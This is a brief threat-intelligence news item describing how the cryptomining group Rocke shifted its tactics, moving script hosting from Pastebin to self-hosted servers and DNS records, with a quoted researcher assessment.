What is the problem?
Researchers have observed that the Chinese cryptomining threat actor group Rocke has changed its tactics, techniques, and procedures (TTPs), to evade detection.
What do we know about the group?
Rocke is a threat actor group that primarily focuses on cryptocurrency mining on compromised machines. This threat group was first spotted by researchers from Cisco Talos in August 2018. This group is known for using malware written in Go.
Rocke has made new updates to its tactics, which include:
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” researchers noted.